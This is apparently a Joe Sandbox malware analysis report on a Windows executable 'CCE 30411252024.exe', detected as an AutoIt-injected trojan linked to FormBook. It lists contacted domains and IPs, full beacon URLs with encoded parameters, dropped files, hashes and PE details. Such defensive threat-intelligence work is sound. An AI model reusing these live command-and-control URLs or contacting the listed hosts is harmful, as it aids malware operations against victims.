Italy 22->36 38 5 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            CCE 30411252024.exe74%ReversingLabsWin32.Trojan.AutoitInject
            CCE 30411252024.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://www.rssnewscast.com/fo8o/?U6YDsxW=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNp7YHjVi2aBezyBUOenUja13YBEIShwN33HoHbXtrY+oqbh1getk=&cPm=bL-XkPyPkF100%Avira URL Cloudmalware
            https://www.empowermedeco.com/fo8o/?U6YDsxW=mxnR0%Avira URL Cloudsafe
            http://www.magmadokum.com/fo8o/?cPm=bL-XkPyPkF&U6YDsxW=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjNWAySNtnq/EMXCTP7S4oEh8mb9sAZyquFiTVTuU6HpMKOeASrGw=0%Avira URL Cloudsafe
            http://www.goldenjade-travel.com/fo8o/?cPm=bL-XkPyPkF&U6YDsxW=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFxgszkgIsi8wfa6/CPqkeX1kME9DjI2TvouO65OvKk6Nl8OEvQ/8=100%Avira URL Cloudmalware
            http://www.empowermedeco.com/fo8o/?U6YDsxW=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKYS1O+KnDGu0Ee7a9fQq7JRnHJ6pn6i4sEdb7G20jo8euDHkgubc=&cPm=bL-XkPyPkF0%Avira URL Cloudsafe
            http://www.elettrosistemista.zip/fo8o/?cPm=bL-XkPyPkF&U6YDsxW=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMMgl3a4mkxzPbkN9BQKjpJMF6ezHcknvvvjzNmyPcHDwhODu1wVk=100%Avira URL Cloudmalware

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            elettrosistemista.zip
            		195.110.124.133
            		truefalse
              		high
              empowermedeco.com
              		217.196.55.202
              		truefalse
                		high
                www.3xfootball.com
                		154.215.72.110
                		truefalse
                  		high
                  www.goldenjade-travel.com
                  		116.50.37.244
                  		truefalse
                    		high
                    www.rssnewscast.com
                    		91.195.240.94
                    		truefalse
                      		high
                      www.techchains.info
                      		66.29.149.46
                      		truefalse
                        		high
                        natroredirect.natrocdn.com
                        		85.159.66.93
                        		truefalse
                          		high
                          www.magmadokum.com
                          		unknown
                          		unknownfalse
                            		high
                            www.donnavariedades.com
                            		unknown
                            		unknownfalse
                              		high
                              www.660danm.top
                              		unknown
                              		unknownfalse
                                		high
                                www.joyesi.xyz
                                		unknown
                                		unknownfalse
                                  		high
                                  www.liangyuen528.com
                                  		unknown
                                  		unknownfalse
                                    		high
                                    www.kasegitai.tokyo
                                    		unknown
                                    		unknownfalse
                                      		high
                                      www.empowermedeco.com
                                      		unknown
                                      		unknownfalse
                                        		high
                                        www.k9vyp11no3.cfd
                                        		unknown
                                        		unknownfalse
                                          		high
                                          www.elettrosistemista.zip
                                          		unknown
                                          		unknownfalse
                                            		high
                                            www.antonio-vivaldi.mobi
                                            		unknown
                                            		unknownfalse
                                              		high

                                              Contacted URLs

                                              NameMaliciousAntivirus DetectionReputation
                                              http://www.rssnewscast.com/fo8o/?U6YDsxW=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNp7YHjVi2aBezyBUOenUja13YBEIShwN33HoHbXtrY+oqbh1getk=&cPm=bL-XkPyPkFtrue
                                              • Avira URL Cloud: malware
                                              		unknown
                                              http://www.empowermedeco.com/fo8o/false
                                                		high
                                                http://www.elettrosistemista.zip/fo8o/false
                                                  		high
                                                  http://www.goldenjade-travel.com/fo8o/?cPm=bL-XkPyPkF&U6YDsxW=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFxgszkgIsi8wfa6/CPqkeX1kME9DjI2TvouO65OvKk6Nl8OEvQ/8=true
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  http://www.magmadokum.com/fo8o/false
                                                    		high
                                                    http://www.rssnewscast.com/fo8o/false
                                                      		high
                                                      http://www.magmadokum.com/fo8o/?cPm=bL-XkPyPkF&U6YDsxW=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjNWAySNtnq/EMXCTP7S4oEh8mb9sAZyquFiTVTuU6HpMKOeASrGw=true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.elettrosistemista.zip/fo8o/?cPm=bL-XkPyPkF&U6YDsxW=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMMgl3a4mkxzPbkN9BQKjpJMF6ezHcknvvvjzNmyPcHDwhODu1wVk=true
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      http://www.empowermedeco.com/fo8o/?U6YDsxW=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKYS1O+KnDGu0Ee7a9fQq7JRnHJ6pn6i4sEdb7G20jo8euDHkgubc=&cPm=bL-XkPyPkFtrue
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.goldenjade-travel.com/fo8o/false
                                                        		high
                                                        http://www.techchains.info/fo8o/false
                                                          		high

                                                          URLs from Memory and Binaries

                                                          NameSourceMaliciousAntivirus DetectionReputation
                                                          https://duckduckgo.com/chrome_newtabnetbtugc.exe, 00000006.00000003.2524613758.00000000077FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://duckduckgo.com/ac/?q=netbtugc.exe, 00000006.00000003.2524613758.00000000077FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://www.google.com/images/branding/product/ico/googleg_lodp.iconetbtugc.exe, 00000006.00000003.2524613758.00000000077FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=netbtugc.exe, 00000006.00000003.2524613758.00000000077FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=netbtugc.exe, 00000006.00000003.2524613758.00000000077FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://www.empowermedeco.comUIOYLdBBxOZnTzrp.exe, 0000000C.00000002.4606386701.000000000561E000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                      		high
                                                                      https://www.ecosia.org/newtab/netbtugc.exe, 00000006.00000003.2524613758.00000000077FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_netbtugc.exe, 00000006.00000002.4605259560.000000000435E000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000006.00000002.4606811514.0000000005F40000.00000004.00000800.00020000.00000000.sdmp, UIOYLdBBxOZnTzrp.exe, 0000000C.00000002.4604826888.0000000003D4E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                          		high
                                                                          https://www.sedo.com/services/parking.php3UIOYLdBBxOZnTzrp.exe, 0000000C.00000002.4604826888.0000000003D4E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            		high
                                                                            https://ac.ecosia.org/autocomplete?q=netbtugc.exe, 00000006.00000003.2524613758.00000000077FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://codepen.io/uzcho_/pens/popular/?grid_type=listnetbtugc.exe, 00000006.00000002.4605259560.0000000004682000.00000004.10000000.00040000.00000000.sdmp, UIOYLdBBxOZnTzrp.exe, 0000000C.00000002.4604826888.0000000004072000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                		high
                                                                                https://codepen.io/uzcho_/pen/eYdmdXw.cssnetbtugc.exe, 00000006.00000002.4605259560.0000000004682000.00000004.10000000.00040000.00000000.sdmp, UIOYLdBBxOZnTzrp.exe, 0000000C.00000002.4604826888.0000000004072000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchnetbtugc.exe, 00000006.00000003.2524613758.00000000077FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://www.empowermedeco.com/fo8o/?U6YDsxW=mxnRnetbtugc.exe, 00000006.00000002.4605259560.0000000004CCA000.00000004.10000000.00040000.00000000.sdmp, UIOYLdBBxOZnTzrp.exe, 0000000C.00000002.4604826888.00000000046BA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=netbtugc.exe, 00000006.00000003.2524613758.00000000077FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high

                                                                                      World Map of Contacted IPs

                                                                                      • No. of IPs < 25%
                                                                                      • 25% < No. of IPs < 50%
                                                                                      • 50% < No. of IPs < 75%
                                                                                      • 75% < No. of IPs

                                                                                      Public IPs

                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                      91.195.240.94
                                                                                      		www.rssnewscast.comGermany
                                                                                      		47846SEDO-ASDEfalse
                                                                                      154.215.72.110
                                                                                      		www.3xfootball.comSeychelles
                                                                                      		132839POWERLINE-AS-APPOWERLINEDATACENTERHKfalse
                                                                                      195.110.124.133
                                                                                      		elettrosistemista.zipItaly
                                                                                      		39729REGISTER-ASITfalse
                                                                                      116.50.37.244
                                                                                      		www.goldenjade-travel.comTaiwan; Republic of China (ROC)
                                                                                      		18046DONGFONG-TWDongFongTechnologyCoLtdTWfalse
                                                                                      85.159.66.93
                                                                                      		natroredirect.natrocdn.comTurkey
                                                                                      		34619CIZGITRfalse
                                                                                      66.29.149.46
                                                                                      		www.techchains.infoUnited States
                                                                                      		19538ADVANTAGECOMUSfalse
                                                                                      217.196.55.202
                                                                                      		empowermedeco.comNorway
                                                                                      		29300AS-DIRECTCONNECTNOfalse

                                                                                      General Information

                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                      Analysis ID:1566620
                                                                                      Start date and time:2024-12-02 14:29:47 +01:00
                                                                                      Joe Sandbox product:CloudBasic
                                                                                      Overall analysis duration:0h 10m 54s
                                                                                      Hypervisor based Inspection enabled:false
                                                                                      Report type:full
                                                                                      Cookbook file name:default.jbs
                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                      Number of analysed new started processes analysed:18
                                                                                      Number of new started drivers analysed:0
                                                                                      Number of existing processes analysed:0
                                                                                      Number of existing drivers analysed:0
                                                                                      Number of injected processes analysed:2
                                                                                      Technologies:
                                                                                      • HCA enabled
                                                                                      • EGA enabled
                                                                                      • AMSI enabled
                                                                                      Analysis Mode:default
                                                                                      Analysis stop reason:Timeout
                                                                                      Sample name:CCE 30411252024.exe
                                                                                      Detection:MAL
                                                                                      Classification:mal100.troj.spyw.evad.winEXE@7/3@16/7
                                                                                      EGA Information:
                                                                                      • Successful, ratio: 75%
                                                                                      HCA Information:
                                                                                      • Successful, ratio: 97%
                                                                                      • Number of executed functions: 47
                                                                                      • Number of non-executed functions: 298
                                                                                      Cookbook Comments:
                                                                                      • Found application associated with file extension: .exe
                                                                                      • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                      Warnings

                                                                                      • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
                                                                                      • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, tse1.mm.bing.net, g.bing.com, arc.msn.com, fe3cr.delivery.mp.microsoft.com
                                                                                      • Execution Graph export aborted for target UIOYLdBBxOZnTzrp.exe, PID 876 because it is empty
                                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                      • VT rate limit hit for: CCE 30411252024.exe

                                                                                      Simulations

                                                                                      Behavior and APIs

                                                                                      TimeTypeDescription
                                                                                      08:31:34API Interceptor8465176x Sleep call for process: netbtugc.exe modified

                                                                                      Joe Sandbox View / Context

                                                                                      IPs

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      91.195.240.94Certificate 11-18720.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.rssnewscast.com/fo8o/
                                                                                      Certificate 11-19AIS.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.rssnewscast.com/fo8o/
                                                                                      Certificate 11-21AIS.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.rssnewscast.com/fo8o/
                                                                                      Certificate 1045-20-11.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.rssnewscast.com/fo8o/
                                                                                      Certificate 719A1120-2024.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.rssnewscast.com/fo8o/
                                                                                      Certificate 64411-18.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.rssnewscast.com/fo8o/
                                                                                      Certificate 11-17.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.rssnewscast.com/fo8o/
                                                                                      Certificate 11-142024.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.rssnewscast.com/fo8o/
                                                                                      rDocument11-142024.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.rssnewscast.com/fo8o/
                                                                                      glued.htaGet hashmaliciousFormBookBrowse
                                                                                      • www.rssnewscast.com/fo8o/
                                                                                      154.215.72.110wOoESPII08.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.3xfootball.com/fo8o/?xVY=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnj6KtR967KJkZjHO4n68kz2fsmRVZ8Q==&Nz=LPhpDRap3
                                                                                      N2sgk6jMa2.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.3xfootball.com/fo8o/?qD=FrMTb&aZ=IhZyPQIGe6uK3zPwzgZotr9BPg6ZX3xlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOn1bCAV966J7ZkoXS5ptBuz2edhBZoh3xN24c=
                                                                                      Document 151-512024.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.3xfootball.com/fo8o/?4h8=YPQX8Tch&FBEd=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnzPSqftK5Z9AZjHO4n69vlG+dhBZ38Q==

                                                                                      Domains

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      www.3xfootball.comCertificate 11-18720.exeGet hashmaliciousFormBookBrowse
                                                                                      • 154.215.72.110
                                                                                      Certificate 11-19AIS.exeGet hashmaliciousFormBookBrowse
                                                                                      • 154.215.72.110
                                                                                      Certificate 11-21AIS.exeGet hashmaliciousFormBookBrowse
                                                                                      • 154.215.72.110
                                                                                      Certificate 1045-20-11.exeGet hashmaliciousFormBookBrowse
                                                                                      • 154.215.72.110
                                                                                      Certificate 719A1120-2024.exeGet hashmaliciousFormBookBrowse
                                                                                      • 154.215.72.110
                                                                                      Certificate 20156-2024.exeGet hashmaliciousFormBookBrowse
                                                                                      • 154.215.72.110
                                                                                      Certificate 11-18720.exeGet hashmaliciousFormBookBrowse
                                                                                      • 154.215.72.110
                                                                                      RvJVMsNLJI.exeGet hashmaliciousFormBookBrowse
                                                                                      • 154.215.72.110
                                                                                      Certificate 64411-18.exeGet hashmaliciousFormBookBrowse
                                                                                      • 154.215.72.110
                                                                                      Certificate 11-17.exeGet hashmaliciousFormBookBrowse
                                                                                      • 154.215.72.110

                                                                                      ASNs

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      POWERLINE-AS-APPOWERLINEDATACENTERHKsh4.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                      • 154.209.101.20
                                                                                      powerpc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                      • 156.230.73.250
                                                                                      mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                      • 156.253.186.202
                                                                                      la.bot.arm.elfGet hashmaliciousMiraiBrowse
                                                                                      • 45.13.160.66
                                                                                      loligang.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                      • 154.220.159.10
                                                                                      botx.m68k.elfGet hashmaliciousMiraiBrowse
                                                                                      • 154.203.73.133
                                                                                      botx.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                      • 154.218.51.85
                                                                                      arm7.elfGet hashmaliciousMiraiBrowse
                                                                                      • 156.251.7.143
                                                                                      x86.elfGet hashmaliciousMiraiBrowse
                                                                                      • 156.242.206.41
                                                                                      arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                      • 202.165.121.202
                                                                                      REGISTER-ASITZAMOWIEN.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                      • 195.110.124.133
                                                                                      Certificate 11-18720.exeGet hashmaliciousFormBookBrowse
                                                                                      • 195.110.124.133
                                                                                      Certificate 11-19AIS.exeGet hashmaliciousFormBookBrowse
                                                                                      • 195.110.124.133
                                                                                      DO-COSU6387686280.pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                      • 195.110.124.133
                                                                                      ZAMOWIEN.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                      • 195.110.124.133
                                                                                      S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                      • 195.110.124.133
                                                                                      Certificate 11-21AIS.exeGet hashmaliciousFormBookBrowse
                                                                                      • 195.110.124.133
                                                                                      Certificate 1045-20-11.exeGet hashmaliciousFormBookBrowse
                                                                                      • 195.110.124.133
                                                                                      Certificate 719A1120-2024.exeGet hashmaliciousFormBookBrowse
                                                                                      • 195.110.124.133
                                                                                      Certificate 11-18720.exeGet hashmaliciousFormBookBrowse
                                                                                      • 195.110.124.133
                                                                                      SEDO-ASDECertificate 11-18720.exeGet hashmaliciousFormBookBrowse
                                                                                      • 91.195.240.94
                                                                                      Certificate 11-19AIS.exeGet hashmaliciousFormBookBrowse
                                                                                      • 91.195.240.94
                                                                                      Certificate 11-21AIS.exeGet hashmaliciousFormBookBrowse
                                                                                      • 91.195.240.94
                                                                                      Certificate 1045-20-11.exeGet hashmaliciousFormBookBrowse
                                                                                      • 91.195.240.94
                                                                                      Certificate 719A1120-2024.exeGet hashmaliciousFormBookBrowse
                                                                                      • 91.195.240.94
                                                                                      Certificate 11-18720.exeGet hashmaliciousFormBookBrowse
                                                                                      • 91.195.240.94
                                                                                      RvJVMsNLJI.exeGet hashmaliciousFormBookBrowse
                                                                                      • 91.195.240.94
                                                                                      Certificate 64411-18.exeGet hashmaliciousFormBookBrowse
                                                                                      • 91.195.240.94
                                                                                      Certificate 11-17.exeGet hashmaliciousFormBookBrowse
                                                                                      • 91.195.240.94
                                                                                      Certificate 11-142024.exeGet hashmaliciousFormBookBrowse
                                                                                      • 91.195.240.94

                                                                                      JA3 Fingerprints

                                                                                      No context

                                                                                      Dropped Files

                                                                                      No context

                                                                                      Created / dropped Files

                                                                                      C:\Users\user\AppData\Local\Temp\Allene

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\CCE 30411252024.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):270848
                                                                                      Entropy (8bit):7.9940973679667575
                                                                                      Encrypted:true
                                                                                      SSDEEP:6144:ifeaFuj/hHL/3XU74J+TDIH1MSjPHu/pL:iWaFuj/hr/3y4J+n21MCHAB
                                                                                      MD5:457A73CA775687E15CE189249A02FA48
                                                                                      SHA1:45D4C45F06CD4881A22885928235F9475A32083E
                                                                                      SHA-256:929D4D680AAD8E03D3834335E46F31E1F6A38B37032287809DA68793D10168E2
                                                                                      SHA-512:52C1A76D1F751EC3A3D0D365061CD6FDBAF381E5863AFEDB623729EE196BA7B4F9E051DCFA1CA8B60BD2BBA41CC782EBA863710CDB723229361F059194C52153
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:..r..YHYHi.Z..p.WT...gGY..VY7ZZYHYH1OTSYHGULOWW0K2ODQ7K6.Y7ZTF.WH.F.r.I..m.?>CkB=+6E*[v:V446<y*To&&7h.;l....&]+!.:F<rY7ZZYHY10F.n9/.h,(.jP,.U...qV1.-..t9/.U...t'2..>4XvR(.Q7K6VY7Z..HY.0NT.1..ULOWW0K2.DS6@7]Y7J^YHYH1OTSY.RULOGW0K.KDQ7.6VI7ZZ[HYN1OTSYHGSLOWW0K2OdU7K4VY7ZZYJY..OTCYHWULOWG0K"ODQ7K6FY7ZZYHYH1OTSYHGULOWW0K2ODQ7K6VY7ZZYHYH1OTSYHGULOWW0K2ODQ7K6VY7ZZYHYH1OTSYHGULOWW0K2ODQ7K6VY7ZZYHYH1OTSYHGULOWW0K2ODQ7K6VY7ZZYHYH1OT}--?!LOW.?O2OTQ7K&RY7JZYHYH1OTSYHGULoWWPK2ODQ7K6VY7ZZYHYH1OTSYHGULOWW0K2ODQ7K6VY7ZZYHYH1OTSYHGULOWW0K2ODQ7K6VY7ZZYHYH1OTSYHGULOWW0K2ODQ7K6VY7ZZYHYH1OTSYHGULOWW0K2ODQ7K6VY7ZZYHYH1OTSYHGULOWW0K2ODQ7K6VY7ZZYHYH1OTSYHGULOWW0K2ODQ7K6VY7ZZYHYH1OTSYHGULOWW0K2ODQ7K6VY7ZZYHYH1OTSYHGULOWW0K2ODQ7K6VY7ZZYHYH1OTSYHGULOWW0K2ODQ7K6VY7ZZYHYH1OTSYHGULOWW0K2ODQ7K6VY7ZZYHYH1OTSYHGULOWW0K2ODQ7K6VY7ZZYHYH1OTSYHGULOWW0K2ODQ7K6VY7ZZYHYH1OTSYHGULOWW0K2ODQ7K6VY7ZZYHYH1OTSYHGULOWW0K2ODQ7K6VY7ZZYHYH1OTSYHGULOWW0K2ODQ7K6VY7ZZYHYH1OTSYHGULOWW0K2ODQ7K6VY7ZZYHYH1OTSYHGULOWW0K2ODQ7K6VY7ZZYHYH1

                                                                                      C:\Users\user\AppData\Local\Temp\F56GKLK7U4

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\netbtugc.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                      Category:dropped
                                                                                      Size (bytes):196608
                                                                                      Entropy (8bit):1.1239949490932863
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                      MD5:271D5F995996735B01672CF227C81C17
                                                                                      SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                      SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                      SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                      Malicious:false
                                                                                      Reputation:high, very likely benign file
                                                                                      Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\autECA6.tmp

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\CCE 30411252024.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):270848
                                                                                      Entropy (8bit):7.9940973679667575
                                                                                      Encrypted:true
                                                                                      SSDEEP:6144:ifeaFuj/hHL/3XU74J+TDIH1MSjPHu/pL:iWaFuj/hr/3y4J+n21MCHAB
                                                                                      MD5:457A73CA775687E15CE189249A02FA48
                                                                                      SHA1:45D4C45F06CD4881A22885928235F9475A32083E
                                                                                      SHA-256:929D4D680AAD8E03D3834335E46F31E1F6A38B37032287809DA68793D10168E2
                                                                                      SHA-512:52C1A76D1F751EC3A3D0D365061CD6FDBAF381E5863AFEDB623729EE196BA7B4F9E051DCFA1CA8B60BD2BBA41CC782EBA863710CDB723229361F059194C52153
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:..r..YHYHi.Z..p.WT...gGY..VY7ZZYHYH1OTSYHGULOWW0K2ODQ7K6.Y7ZTF.WH.F.r.I..m.?>CkB=+6E*[v:V446<y*To&&7h.;l....&]+!.:F<rY7ZZYHY10F.n9/.h,(.jP,.U...qV1.-..t9/.U...t'2..>4XvR(.Q7K6VY7Z..HY.0NT.1..ULOWW0K2.DS6@7]Y7J^YHYH1OTSY.RULOGW0K.KDQ7.6VI7ZZ[HYN1OTSYHGSLOWW0K2OdU7K4VY7ZZYJY..OTCYHWULOWG0K"ODQ7K6FY7ZZYHYH1OTSYHGULOWW0K2ODQ7K6VY7ZZYHYH1OTSYHGULOWW0K2ODQ7K6VY7ZZYHYH1OTSYHGULOWW0K2ODQ7K6VY7ZZYHYH1OTSYHGULOWW0K2ODQ7K6VY7ZZYHYH1OT}--?!LOW.?O2OTQ7K&RY7JZYHYH1OTSYHGULoWWPK2ODQ7K6VY7ZZYHYH1OTSYHGULOWW0K2ODQ7K6VY7ZZYHYH1OTSYHGULOWW0K2ODQ7K6VY7ZZYHYH1OTSYHGULOWW0K2ODQ7K6VY7ZZYHYH1OTSYHGULOWW0K2ODQ7K6VY7ZZYHYH1OTSYHGULOWW0K2ODQ7K6VY7ZZYHYH1OTSYHGULOWW0K2ODQ7K6VY7ZZYHYH1OTSYHGULOWW0K2ODQ7K6VY7ZZYHYH1OTSYHGULOWW0K2ODQ7K6VY7ZZYHYH1OTSYHGULOWW0K2ODQ7K6VY7ZZYHYH1OTSYHGULOWW0K2ODQ7K6VY7ZZYHYH1OTSYHGULOWW0K2ODQ7K6VY7ZZYHYH1OTSYHGULOWW0K2ODQ7K6VY7ZZYHYH1OTSYHGULOWW0K2ODQ7K6VY7ZZYHYH1OTSYHGULOWW0K2ODQ7K6VY7ZZYHYH1OTSYHGULOWW0K2ODQ7K6VY7ZZYHYH1OTSYHGULOWW0K2ODQ7K6VY7ZZYHYH1OTSYHGULOWW0K2ODQ7K6VY7ZZYHYH1

                                                                                      Static File Info

                                                                                      General

                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Entropy (8bit):7.124867476343508
                                                                                      TrID:
                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                      File name:CCE 30411252024.exe
                                                                                      File size:1'191'424 bytes
                                                                                      MD5:ace5b81f6392ca5ce9a2e0953e6d6e4e
                                                                                      SHA1:bb0a075a44d599c7976703e186e1a70f891f9163
                                                                                      SHA256:74c3f1d43d2fbd0eeab386cb0086150568cef240d65b2efd0061721d6a0514ed
                                                                                      SHA512:2194cbf1ce6d06ad5e973c3abb736d71c21e5f93094f9b2cfd67b76157ac02f1616d7eaf9d0c2f98cbed67b5b90d29d1f239482cc7bbcb2e41f901da53e49b25
                                                                                      SSDEEP:24576:ntb20pkaCqT5TBWgNQ7ahZiAQWAw+JS60Koqm6O6A:kVg5tQ7ahQA8MKoqO5
                                                                                      TLSH:B745C02373DD8361C7B25273BA25B701BEBF782506A1F56B2FD4093DE920122525EA73
                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........

                                                                                      File Icon

                                                                                      Icon Hash:aaf3e3e3938382a0

                                                                                      Static PE Info

                                                                                      General

                                                                                      Entrypoint:0x425f74
                                                                                      Entrypoint Section:.text
                                                                                      Digitally signed:false
                                                                                      Imagebase:0x400000
                                                                                      Subsystem:windows gui
